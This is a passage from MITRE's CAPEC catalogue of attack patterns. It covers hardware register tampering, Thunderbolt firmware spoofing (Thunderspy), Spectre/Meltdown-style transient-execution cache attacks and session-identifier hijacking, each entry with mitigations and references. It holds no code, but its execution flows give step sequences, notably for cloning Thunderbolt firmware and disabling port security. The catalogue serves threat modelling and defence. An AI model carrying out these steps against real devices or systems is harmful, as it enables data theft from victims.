ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	1	Accessing Functionality Not Properly Constrained by ACLs
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	180	Exploiting Incorrectly Configured Access Control Security Levels

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware
Mechanisms of Attack	Subvert Access Control

Prerequisites

Awareness of the hardware being leveraged.

Access to the hardware being leveraged.

Skills Required

[Level: High]

Intricate knowledge of registers.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data

Mitigations

Design proper access control policies for hardware register access from software and ensure these policies are implemented in accordance with the specified design.

Ensure security lock bit protections are reviewed for design inconsistencies and common weaknesses.

Test security lock programming flow in both pre-silicon and post-silicon environments.

Leverage automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros.

Ensure that measurement data is stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent.

Example Instances

During a System-on-Chip's (SoC) secure boot process, the code to be authenticated is measured to determine the code's validity. This entails the one-way hash of the code binary being calculated and extended to the previous hash. The value obtained after completion of the boot flow is then stored in a register with the intent of later verifying this value to determine if the boot flow has been tampered with. However, the register being used does not prevent an adversary from modifying the register's contents, which can result in the adversary spoofing the measurement data used in the attestation process.

Related Weaknesses

CWE-ID	Weakness Name
1224	Improper Restriction of Write-Once Bit Fields
1231	Improper Prevention of Lock Bit Modification
1233	Security-Sensitive Hardware Controls with Missing Lock Bit Protection
1262	Improper Access Control for Register Interface
1283	Mutable Attestation or Measurement Reporting Data

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parents CAPEC-1, CAPEC-180 )

References

[REF-693] Brandon Hill. "Huge Intel CPU Bug Allegedly Causes Kernel Memory Vulnerability With Up To 30% Performance Hit In Windows And Linux". David Altavilla and Hot Hardware, Inc. 2018-01-02. <https://hothardware.com/news/intel-cpu-bug-kernel-memory-isolation-linux-windows-macos>. URL validated: 2021-10-21.

Content History

Submissions
Submission Date	Submitter	Organization
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

Attack Pattern ID: 665

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	276	Inter-component Protocol Manipulation
PeerOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	148	Content Spoofing
PeerOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	458	Flash Memory Attacks
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	390	Bypassing Physical Security

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Survey physical victim environment and potential Thunderbolt system targets: The adversary monitors the target's physical environment to identify systems with Thunderbolt interfaces, identify potential weaknesses in physical security in addition to periods of nonattendance by the victim over their Thunderbolt interface equipped devices, and when the devices are in locked or sleep state.
Evaluate the target system and its Thunderbolt interface: The adversary determines the device's operating system, Thunderbolt interface version, and any implemented Thunderbolt protections to plan the attack.

Experiment

Obtain and/or clone firmware image: The adversary physically manipulates Thunderbolt enabled devices to acquire the firmware image from the target and/or adversary Thunderbolt host controller's SPI (Serial Peripheral Interface) flash.

Techniques
Disassemble victim and/or adversary device enclosure with basic tools to gain access to Thunderbolt controller SPI flash by connecting adversary SPI programmer.
Adversary connects SPI programmer to adversary-controlled Thunderbolt enabled device to obtain/clone victim thunderbolt controller firmware image through tools/scripts.
Clone firmware image with SPI programmer and tools/scripts on adversary-controlled device.

Parse and locate relevant firmware data structures and information based upon Thunderbolt controller model, firmware version, and other information: The acquired victim and/or adversary firmware image is parsed for specific data and other relevant identifiers required for exploitation, based upon the victim device information and firmware version.

Techniques
Utilize pre-crafted tools/scripts to parse and locate desired firmware data and modify it.
Locate DROM (Device Read Only Memory) data structure section and calculate/determine appropriate offset to replicate victim device UUID.
Locate ACL (Access Control List) data structure and calculate/determine appropriate offsets to identify victim device UUID.
Locate data structure containing challenge-response key information between appropriate offsets.

Disable Thunderbolt security and prevent future Thunderbolt security modifications (if necessary): The adversary overrides the target device's Thunderbolt Security Level to "None" (SL0) and/or enables block protections upon the SPI flash to prevent the ability for the victim to perform and/or recognize future Thunderbolt security modifications as well as update the Thunderbolt firmware.

Techniques
The adversary-controlled Thunderbolt device, connected to SPI programmer and victim device via Thunderbolt ports, is utilized to execute commands within tools/scripts to disable SPI flash protections, modify Thunderbolt Security Level, and enable malicious SPI flash protections.

Modify/replace victim Thunderbolt firmware image: The modified victim and/or adversary thunderbolt firmware image is written to attacker SPI flash.

Exploit

Connect adversary-controlled thunderbolt enabled device to victim device and verify successful execution of malicious actions: The adversary needs to determine if their exploitation of selected vulnerabilities had the intended effects upon victim device.

Techniques
Observe victim device identify adversary device as the victim device and enables PCIe tunneling.
Resume victim device from sleep, connect adversary-controlled device and observe security is disabled and Thunderbolt connectivity is restored with PCIe tunneling being enabled.
Observe that in UEFI or Thunderbolt Management Tool/UI that the Security Level does not match adversary modified Security Level of "None" (SL0)
Observe after installation of Firmware update that within Thunderbolt Management UI the "NVM version" is unchanged/same prior to the prompt of successful Firmware update/installation.

Exfiltration of desired data from victim device to adversary device: Utilize PCIe tunneling to transfer desired data and information from victim device across Thunderbolt connection.

Prerequisites

The adversary needs at least a few minutes of physical access to a system with an open Thunderbolt port, version 3 or lower, and an external thunderbolt device controlled by the adversary with maliciously crafted software and firmware, via an SPI Programming device, to exploit weaknesses in security protections.

Skills Required

[Level: High]

Detailed knowledge on various system motherboards, PCI Express Domain, SPI, and Thunderbolt Protocol in order to interface with internal system components via external devices.

[Level: High]

Detailed knowledge on OS/Kernel memory address space, Direct Memory Access (DMA) mapping, Input-Output Memory Management Units (IOMMUs), and vendor memory protections for data leakage.

[Level: High]

Detailed knowledge on scripting and SPI programming in order to configure and modify Thunderbolt controller firmware and software configurations.

Resources Required

SPI Programming device capable of modifying/configuring or replacing the firmware of Thunderbolt device stored on SPI Flash of target Thunderbolt controller, as well as modification/spoofing of adversary-controlled Thunderbolt controller.

Precrafted scripts/tools capable of implementing the modification and replacement of Thunderbolt Firmware.

Thunderbolt-enabled computing device capable of interfacing with target Thunderbolt device and extracting/dumping data and memory contents of target device.

Indicators

Windows Event logs may document the access of Thunderbolt port as a USB 3.0 event as well as any malicious actions taken upon target device as file system and memory events.

Consequences

Scope	Impact	Likelihood
Access Control	Bypass Protection Mechanism
Confidentiality	Read Data
Integrity	Modify Data
Authorization	Execute Unauthorized Commands

Mitigations

Implementation: Kernel Direct Memory Access Protection

Configuration: Enable UEFI option USB Passthrough mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface

Configuration: Enable UEFI option DisplayPort mode - Thunderbolt 3 system port operates as video-only DP interface

Configuration: Enable UEFI option Mixed USB/DisplayPort mode - Thunderbolt 3 system port operates as USB 3.1 Type C interface with support for DP mode

Configuration: Set Security Level to SL3 for Thunderbolt 2 system port

Configuration: Disable PCIe tunneling to set Security Level to SL3

Configuration: Disable Boot Camp upon MacOS systems

Example Instances

An adversary steals a password protected laptop that contains a Thunderbolt 3 enabled port, from a work environment. The adversary uses a screw driver to remove the back panel of the laptop and connects a SPI Programming device to the Thunderbolt Host Controller SPI Flash of the stolen victim device to interface with it on the adversary's own Thunderbolt enabled device via Thunderbolt cables. The SPI Programming device is utilized to execute scripts/tools from the adversary's own system to copy, parse, and modify the victim's Thunderbolt firmware stored on SPI Flash. The device UUID value is obtained, by computing the appropriate offset based upon Thunderbolt firmware version and the OS of victim device, from the DROM section of victim Thunderbolt host controller firmware image. The firmware image is written to adversary Thunderbolt host controller SPI flash to clone and spoof victim device identity. The adversary reboots the victim device, with the victim device identifying the Thunderbolt connection of the adversary's Thunderbolt device as itself and enables PCIe tunneling. The adversary finally transfers the hard drive and memory contents of victim device across Thunderbolt connection.

Related Weaknesses

CWE-ID	Weakness Name
345	Insufficient Verification of Data Authenticity
353	Missing Support for Integrity Check
288	Authentication Bypass Using an Alternate Path or Channel
1188	Insecure Default Initialization of Resource
862	Missing Authorization

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1211	Exploitation for Defensive Evasion
1542.002	Pre-OS Boot: Component Firmware
1556	Modify Authentication Process

References

[REF-647] Björn Ruytenberg. "Thunderspy When Lighting Strikes Thrice: Breaking Thunderbolt 3 Security". Eindhoven University of Technology. 2020. <https://thunderspy.io/>. URL validated: 2021-05-17.

[REF-648] Björn Ruytenberg. "Breaking Thunderbolt Protocol Security: Vulnerability Report". Eindhoven University of Technology. 2020-04-17. <https://thunderspy.io/assets/reports/breaking-thunderbolt-security-bjorn-ruytenberg-20200417.pdf>. URL validated: 2021-05-17.

[REF-649] Liam Tung. "Thunderbolt flaws affect millions of computers – even locking unattended devices won't help". ZDNet. 2020-05-11. <https://www.zdnet.com/article/thunderbolt-flaws-affect-millions-of-computers-even-locking-unattended-devices-wont-help/>. URL validated: 2021-05-17.

[REF-650] Liam Tung. "Microsoft: Worried about Thunderbolt attacks? Get a Windows 10 Secured-Core PC". ZDNet. 2020-05-14. <https://www.zdnet.com/article/microsoft-worried-about-thunderbolt-attacks-get-a-windows-10-secured-core-pc/>. URL validated: 2021-05-17.

[REF-651] Jon Porter. "Thunderbolt flaw allows access to a PC’s data in minutes". The Verge. 2020-05-11. <https://www.theverge.com/2020/5/11/21254290/thunderbolt-security-vulnerability-thunderspy-encryption-access-intel-laptops>. URL validated: 2021-05-17.

[REF-652] Jerry Bryant. "MORE INFORMATION ON THUNDERBOLT(TM) SECURITY". Intel Corporation. 2020-05-10. <https://blogs.intel.com/technology/2020/05/more-information-on-thunderspy/#gs.0o6pmk>. URL validated: 2021-05-17.

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-663: Exploitation of Transient Instruction Execution

Attack Pattern ID: 663

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	74	Manipulating State
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	184	Software Integrity Attack
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	696	Load Value Injection
PeerOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	124	Shared Resource Manipulation
PeerOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	180	Exploiting Incorrectly Configured Access Control Security Levels
PeerOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	212	Functionality Misuse
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	141	Cache Poisoning

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Manipulate System Resources, Manipulate Timing and State
Supply Chain Risks	Sustainment

Execution Flow

Explore

Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack.
Techniques
Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.
Explore cache and identify impacts: Utilize tools to understand the impact of transient instruction execution upon address spaces and CPU operations.
Techniques
Run OS or application specific tools that examine the contents of cache.

Experiment

Cause conditions for identified transient instruction set execution: Adversary ensures that specific code/instructions of the target process are executed by CPU, so desired transient instructions are executed.

Cause specific secret data to be cached from restricted address space: Executed instruction sets (gadgets) in target address space, initially executed via adversary-chosen transient instructions sets, establish covert channel and transfer secret data across this channel to cache.

Techniques

Prediction-based - adversary trains CPU to incorrectly predict/speculate conditions for instruction execution to be true, hence executing adversary-chosen transient instructions. These prediction-based methods include: Pattern History Table (PHT)/Input Validation Bypass, Branch Target Buffer (BTB)/Branch Target Injection, Return Stack Buffer (RSB)/Return Address Injection, and Store To Load (STL)/Speculative Store Bypass.

Exception/Fault-based - adversary has CPU execute transient instructions that raise an exception allowing inaccessible memory space to be accessed via out-of-order execution. These exception/fault-based methods include: Supervisor-only Bypass, Virtual Translation Bypass, System Register Bypass, FPU Register Bypass, Read-only Bypass, Protection Key Bypass, and Bounds Check Bypass.

Exploit

Perform covert channel attack to obtain/access secret data: Adversary process code removes instructions/data from shared cache set, waits for target process to reinsert them back into cache, to identify location of secret data via a timing method. Adversary continuously repeat this process to identify and access entirety of targeted secret data.

Techniques
Flush+Reload - adversary frequently flushes targeted memory cache line using a dedicated machine flush instruction, and uses another process to measure time taken for CPU to load victim secret data.
Evict+Time - adversary causes victim to load target set into cache and measures time for victim process to load this data, setting a baseline. Adversary evicts a specified cache line and causes victim process to execute again, and measures any change in execution time, to determine if cache line was accessed.
Prime+Probe - adversary primes cache by filling cache line(s) or set(s) with data, after some time victim process evicts this adversary data to replace it with secret data. The adversary then probes/accesses all the previously accessed cache lines detecting cache misses, which determine that their attacker data has been evicted and replaced with secret data from victim process.

Prerequisites

The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU.

Skills Required

[Level: High]

Detailed knowledge on how various CPU architectures and microcode perform transient execution for various low-level assembly language code instructions/operations.

[Level: High]

Detailed knowledge on compiled binaries and operating system shared libraries of instruction sequences, and layout of application and OS/Kernel address spaces for data leakage.

Resources Required

C2C mechanism or direct access to victim system, capable of dropping malicious program and collecting covert channel attack data.

Malicious program capable of triggering execution of transient instructions or vulnerable instruction sequences of victim program and performing a covert channel attack to gather data from victim process memory space. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources of the victim machine.

Indicators

File Signatures for Malicious Software capable of abusing Transient Instruction Set Execution

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Access Control	Bypass Protection Mechanism
Authorization	Execute Unauthorized Commands

Mitigations

Implementation: DAWG (Dynamically Allocated Way Guard) - processor cache properly divided between different programs/processes that don't share resources

Implementation: KPTI (Kernel Page-Table Isolation) to completely separate user-space and kernel space page tables

Configuration: Architectural Design of Microcode to limit abuse of speculative execution and out-of-order execution

Configuration: Disable SharedArrayBuffer for Web Browsers

Configuration: Disable Copy-on-Write between Cloud VMs

Configuration: Privilege Checks on Cache Flush Instructions

Implementation: Non-inclusive Cache Memories to prevent Flush+Reload Attacks

Example Instances

A web browser with user-privileges executes JavaScript code imbedded within a malicious website. The system does not disable shared buffers for the web browser and there is no restriction or check upon user-process execution of flush or evict instructions. The Javascript code executes vulnerable transient instructions upon system to cause microarchitectural changes that establish covert channel and transfer sensitive/secret data into shared cache from address space of either kernel, web browser or another executing process on the system.

Related Weaknesses

CWE-ID	Weakness Name
1037	Processor Optimization Removal or Modification of Security-critical Code
1303	Non-Transparent Sharing of Microarchitectural Resources
1264	Hardware Logic with Insecure De-Synchronization between Control and Data Channels

References

[REF-637] Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz and Yuval Yarom. "Spectre Attacks: Exploiting Speculative Execution". Graz University of Technology. 2019. <https://spectreattack.com/spectre.pdf>. URL validated: 2021-03-05.

[REF-638] Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom and Mike Hamburg. "Meltdown: Reading Kernel Memory from User Space". Graz University of Technology. 2018. <https://meltdownattack.com/meltdown.pdf>. URL validated: 2021-03-05.

[REF-639] Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin and Daniel Gruss. "A Systematic Evaluation of Transient Execution Attacks and Defenses". Graz University of Technology. 2019-05-15. <https://arxiv.org/abs/1811.05441>. URL validated: 2021-03-05.

[REF-640] Qian Ge, Yuval Yarom and Gernot Heiser. "A Survey of Microarchitectural Timing Attacks and Countermeasures on Contemporary Hardware". Journal of Cryptographic Engineering. 2016-12-26. <https://eprint.iacr.org/2016/613.pdf>. URL validated: 2021-03-05.

[REF-641] Nael Abu-Ghazaleh, Dmitry Ponomarev and Dmitry Evtyushkin. "How the Spectre and Meltdown Hacks Really Worked". IEEE Spectrum. 2019-02-28. <https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked>. URL validated: 2021-03-05.

[REF-642] James Sanders. "Spectre and Meltdown explained: A comprehensive guide for professionals". TechRepublic. 2019-05-15. <https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked>. URL validated: 2021-03-05.

[REF-643] "Alert (TA18-004A) Meltdown and Spectre Side-Channel Vulnerability Guidance". CISA. 2018-01-04. <https://us-cert.cisa.gov/ncas/alerts/TA18-004A>. URL validated: 2021-03-05.

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Related_Attack_Patterns

CAPEC-21: Exploitation of Trusted Identifiers

Attack Pattern ID: 21

Abstraction: Meta

View customized information:

Description

An adversary guesses, obtains, or "rides" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.

Extended Description

Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.

Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes "trust" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. An adversary may also "ride" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.

Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	62	Cross Site Request Forgery
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	196	Session Credential Falsification through Forging
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	510	SaaS User Request Forgery
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	593	Session Hijacking
PeerOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	12	Choosing Message Identifier

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Survey the application for Indicators of Susceptibility: Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.
Techniques
Spider all available pages
Attack known bad interfaces
Search outward-facing configuration and properties files for identifiers.

Experiment

Fetch samples: The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.

Techniques
An adversary makes many anonymous connections and records the session IDs assigned.
An adversary makes authorized connections and records the session tokens or credentials issued.
An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system.

Exploit

Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application
Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.
Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

Prerequisites

Server software must rely on weak identifier proof and/or verification schemes.

Identifiers must have long lifetimes and potential for reusability.

Server software must allow concurrent sessions to exist.

Skills Required

[Level: Low]

To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user

Resources Required

Ability to deploy software on network.

Ability to communicate synchronously or asynchronously with server.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authentication	Gain Privileges
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit.

Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf.

Implementation: If the identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens.

Implementation: If the web or application server supports it, then encrypting and/or signing the identifier (such as cookie) can protect the ID if intercepted.

Design: Use strong session identifiers that are protected in transit and at rest.

Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.

Implementation: Verify authenticity of all identifiers at runtime.

Example Instances

Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.

A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.

The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application.

For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so.

Related Weaknesses

CWE-ID	Weakness Name
290	Authentication Bypass by Spoofing
302	Authentication Bypass by Assumed-Immutable Data
346	Origin Validation Error
539	Use of Persistent Cookies Containing Sensitive Information
6	J2EE Misconfiguration: Insufficient Session-ID Length
384	Session Fixation
664	Improper Control of a Resource Through its Lifetime
602	Client-Side Enforcement of Server-Side Security
642	External Control of Critical State Data

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1134	Access Token Manipulation
1528	Steal Application Access Token
1539	Steal Web Session Cookie

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Name, @Status, Consequences, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites, Resources_Required, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Example_Instances
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2015-11-09 (Version 2.7)	Exploitation of Session Variables, Resource IDs and other Trusted Credentials

2020-07-30 (Version 3.3)	Exploitation of Trusted Credentials

CAPEC-702: Exploiting Incorrect Chaining or Granularity of Hardware Debug Components

Attack Pattern ID: 702

Abstraction: Detailed

View customized information:

Description

Extended Description

Chip designers often include design elements in a chip for debugging and troubleshooting such as:

Various Test Access Ports (TAPs) which allow boundary scan commands to be executed.
Scan cells that allow the chip to be used as a "stimulus and response" mechanism for scanning the internal components of a chip.
Custom methods to observe the internal components of their chips by placing various tracing hubs within their chip and creating hierarchical or interconnected structures among those hubs.

Because devices commonly have multiple chips and debug components, designers will connect debug components and expose them through a single external interface, which is referred to as “chaining”. Logic errors during design or synthesis could misconfigure the chaining of the debug components, which could allow unintended access. TAPs are also commonly referred to as JTAG interfaces.

Likelihood Of Attack

Low

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
